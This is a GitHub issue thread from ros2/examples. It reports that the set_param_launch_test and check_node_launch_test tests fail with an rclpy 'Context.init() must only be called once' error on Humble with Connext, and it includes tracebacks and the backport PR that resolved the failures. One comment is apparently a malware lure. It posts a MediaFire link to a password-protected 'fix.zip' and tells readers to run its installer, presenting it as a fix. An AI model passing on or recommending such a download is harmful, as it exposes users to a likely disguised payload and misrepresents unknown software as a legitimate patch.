ros2/examples #391: :farmer: launch_testing_exaples tests `set_param_launch_test` and `check_node_launch_test` RuntimeError in Humble Connext

Crola1702, 2024-08-26:
## Bug report

**Required Info:**

- Operating System:
  - Ubuntu Jammy
- Installation type:
  - Source
- Version or commit hash:
  - Humble
- DDS implementation:
  - RTI Connext
- Client library (if applicable):
  - Rclpy (shown in log output)

#### Steps to reproduce issue
1. Run a build in [Hci__nightly-connext_ubuntu_jammy_amd64](https://build.ros2.org/job/Hci__nightly-connext_ubuntu_jammy_amd64/)
2. See launch_testing_examples test failures

#### Additional information

Reference build: 
* [Hci__nightly-connext_ubuntu_jammy_amd64#266](https://build.ros2.org/job/Hci__nightly-connext_ubuntu_jammy_amd64/266)

Test regressions:
* [launch_testing_examples.launch_testing_examples.check_node_launch_test.launch_testing_examples.check_node_launch_test](https://build.ros2.org/job/Hci__nightly-connext_ubuntu_jammy_amd64/266/testReport/junit/launch_testing_examples.launch_testing_examples/check_node_launch_test/launch_testing_examples_check_node_launch_test/)
* [launch_testing_examples.launch_testing_examples.set_param_launch_test.launch_testing_examples.set_param_launch_test](https://build.ros2.org/job/Hci__nightly-connext_ubuntu_jammy_amd64/266/testReport/junit/launch_testing_examples.launch_testing_examples/set_param_launch_test/launch_testing_examples_set_param_launch_test/)
* [launch_testing_ros.test.examples.check_node_launch_test.check_node_launch_test](https://build.ros2.org/job/Hci__nightly-connext_ubuntu_jammy_amd64/266/testReport/junit/launch_testing_ros.test.examples/check_node_launch_test/check_node_launch_test/)

Log output:
```
=================================== FAILURES ===================================
_________ launch tests: launch_testing_examples.check_node_launch_test _________

========================================================================================================================================================
FAIL: launch_testing_examples.check_node_launch_test.TestFixture.test_node_start
--------------------------------------------------------------------------------------------------------------------------------------------------------
Traceback (most recent call last):
  File "/tmp/ws/src/ros2/examples/launch_testing/launch_testing_examples/launch_testing_examples/check_node_launch_test.py", line 48, in test_node_start
    rclpy.init()
  File "/tmp/ws/install_isolated/rclpy/local/lib/python3.10/dist-packages/rclpy/__init__.py", line 88, in init
    context.init(args, domain_id=domain_id)
  File "/tmp/ws/install_isolated/rclpy/local/lib/python3.10/dist-packages/rclpy/context.py", line 70, in init
    raise RuntimeError('Context.init() must only be called once')
RuntimeError: Context.init() must only be called once

...

_________ launch tests: launch_testing_examples.set_param_launch_test __________

==========================================================================================================================================================
FAIL: launch_testing_examples.set_param_launch_test.TestFixture.test_set_parameter
----------------------------------------------------------------------------------------------------------------------------------------------------------
Traceback (most recent call last):
  File "/tmp/ws/src/ros2/examples/launch_testing/launch_testing_examples/launch_testing_examples/set_param_launch_test.py", line 47, in test_set_parameter
    rclpy.init()
  File "/tmp/ws/install_isolated/rclpy/local/lib/python3.10/dist-packages/rclpy/__init__.py", line 88, in init
    context.init(args, domain_id=domain_id)
  File "/tmp/ws/install_isolated/rclpy/local/lib/python3.10/dist-packages/rclpy/context.py", line 70, in init
    raise RuntimeError('Context.init() must only be called once')
RuntimeError: Context.init() must only be called once
```

itbear-shu, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

fujitatomoya, 2024-09-17:
@Crola1702 it looks like fixes are already applied to humble and iron, do we still have the same failure after those patches? or we can close this one?

Crola1702, 2024-10-09:
> @Crola1702 it looks like fixes are already applied to humble and iron, do we still have the same failure after those patches? or we can close this one?

This is not happening anymore. Thanks for the reminder

PR #393 (2024-09-06): Cleanup the launch_testing_examples. (backport #374)
This is to make them more robust when run in parallel with other tests.  In particular, we make sure that the tests cleanup after themselves, and we also increase the timeouts to 15 seconds.

This should improve some of the flaky tests in this package, like we see in https://ci.ros2.org/view/nightly/job/nightly_linux_repeated/3385/#showFailuresLink<hr>This is an automatic backport of pull request #374 done by [Mergify](https://mergify.com).

Note that this fixes #391
closed 2024-10-09 by Crola1702